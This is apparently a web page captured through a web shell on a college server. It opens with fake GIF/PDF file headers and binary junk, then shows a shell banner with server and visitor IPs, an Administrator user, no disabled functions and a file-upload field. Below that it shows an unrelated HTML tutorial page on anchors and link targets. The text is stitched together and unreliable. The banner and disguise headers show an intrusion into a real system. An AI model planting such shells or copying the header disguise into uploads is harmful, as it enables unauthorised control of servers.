GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch6/ |
Upload File : |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <!-- saved from url=(0054)http://mmdt1021.ridgewater.net/chapter6/chapter6p2.htm --> <HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><TITLE>MMDT1021 Chapter 6 Notes - page 2</TITLE> <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><LINK href="MMDT1021%20Chapter%206%20Notes%20-%20page%202_files/style.css" type=text/css rel=stylesheet> <META content="MSHTML 6.00.6000.16481" name=GENERATOR></HEAD> <BODY> <P class=pagetitle align=center>MMDT1021 Chapter 6 Notes - page 2</P> <P class=sectiontitle>Creating Anchors</P> <TABLE width=750 bgColor=#ffffff border=1> <TBODY> <TR> <TH width="85%">Code</TH> <TH width="15%">Page</TH></TR> <TR> <TD width="85%"><CODE>A page with the following Anchors: <a name="ABBR"></a> <a name="ACRONYM"></a> <a name="ADDRESS"></a> <a name="CITE"></a> <a name="CODE"></a> <a name="DEL"></a> <a name="DFN"></a> <a name="EM"></a> <a name="INS"></a> <a name="KBD"></a> <a name="Q"></a> <a name="SAMP"></a> <a name="STRIKE"></a> <a name="STRONG"></a> <a name="VAR"></a> <a name="B"></a> <a name="BIG"></a> <a name="BLINK"></a> <a name="FONT"></a> <a name="I"></a> <a name="SMALL"></a> <a name="SUB"></a> <a name="SUP"></a> <a name="TT"></a> <a name="U"></a></CODE></TD> <TD width="15%"><A href="http://mmdt1021.ridgewater.net/htmlnotes/formatting/CharacterFormatting.htm">Result</A><BR><A href="http://mmdt1021.ridgewater.net/chapter6/examples/chapter6p2a.txt">Source</A></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0> <TBODY> <TR> <TD width="100%">Note: Some browsers seem to be buggy in respects to the anchor. I found that for an Anchor to work all the time, there <STRONG>must</STRONG> be some text of some sorts between the opening "a" tag and the closing "a" tag. Example: <a name="ANCHORNAME"><I>Some Text</I></a> <P>If you don't want any text to show, then do something like this:<BR><CODE><a name="ANCHORNAME">&nbsp;</a></CODE><BR>The &nbsp; is a non-breaking space and is a good invisible text marker.</P></TD></TR></TBODY></TABLE> <P class=sectiontitle>Linking to a Specific Anchor</P> <TABLE width=750 bgColor=#ffffff border=1> <TBODY> <TR> <TH width="85%">Code</TH> <TH width="15%">Page</TH></TR> <TR> <TD width="85%"><CODE><a href="../htmlnotes/formatting/CharacterFormatting.htm#code">CODE</a></CODE></TD> <TD width="15%"><A href="http://mmdt1021.ridgewater.net/htmlnotes/formatting/CharacterFormatting.htm#code">CODE</A></TD></TR></TBODY></TABLE> <TABLE width=750 bgColor=#ffffff border=1> <TBODY> <TR> <TH width="85%">Code</TH> <TH width="15%">Page</TH></TR> <TR> <TD width="85%"><CODE><a href="../htmlnotes/formatting/CharacterFormatting.htm#blink">BLINK</a></CODE></TD> <TD width="15%"><A href="http://mmdt1021.ridgewater.net/htmlnotes/formatting/CharacterFormatting.htm#blink">BLINK</A></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0> <TBODY> <TR> <TD width="100%"><SPAN class=sectiontitle>Targeting Links to Specific Windows</SPAN> <OL><B>Special Target Names</B><BR> <LI><CODE>TARGET="_blank"</CODE> This target will cause the link to always be loaded in a new blank window. This window is not named.<BR> <LI><CODE>TARGET="_parent"</CODE> This target makes the link load in the immediate FRAMESET parent of this document. This defaults to acting like "_self" if the document has no parent.<BR> <LI><CODE>TARGET="_search"</CODE> This target causes the link to load in the browser's Search pane. (Internet Explorer 5.0 and later.)<BR> <LI><CODE>TARGET="_self"</CODE> This target causes the link to always load in the same window where the action originated. This is useful for overriding a globally assigned BASE target.<BR> <LI><CODE>TARGET="_top"</CODE> This target makes the link load in the full body of the window. This defaults to acting like "_self" if the document is already at the top. It is useful for breaking out of an arbitrarily deep FRAME nesting. </LI></OL> </TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0> <TBODY> <TR> <TD width="100%">This link opens the document in a new window.</TD></TR></TBODY></TABLE> <TABLE width=750 bgColor=#ffffff border=1> <TBODY> <TR> <TH width="50%">Code</TH> <TH width="50%">Result</TH></TR> <TR> <TD width="50%"><CODE>This is some text before the link. <a href="../index.htm" target="_blank">MMDT1021 Internet and the Web</a> This is some text after the link.</CODE></TD> <TD width="50%">This is some text before the link. <A href="http://mmdt1021.ridgewater.net/index.htm" target=_blank>MMDT1021 Internet and the Web</A> This is some text after the link.</TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0> <TBODY> <TR> <TD width="100%">This link opens the document in a search pane.</TD></TR></TBODY></TABLE> <TABLE width=750 bgColor=#ffffff border=1> <TBODY> <TR> <TH width="50%">Code</TH> <TH width="50%">Result</TH></TR> <TR> <TD width="50%"><CODE>This is some text before the link. <a href="search.htm" target="_search">Search the Net </a> This is some text after the link.</CODE></TD> <TD width="50%">This is some text before the link. <A href="http://mmdt1021.ridgewater.net/chapter6/search.htm" target=_search>Search the Net </A>This is some text after the link.</TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0> <TBODY> <TR> <TD width="100%"><SPAN class=sectiontitle>Setting the Default Target </SPAN> <P>Use the <B><BASE TARGET="<I>_targetname</I>"></B> tag to set the default target type for all links on a page. The default target when none is set is <CODE>"_self"</CODE>.</P></TD></TR></TBODY></TABLE> <P> </P></BODY></HTML>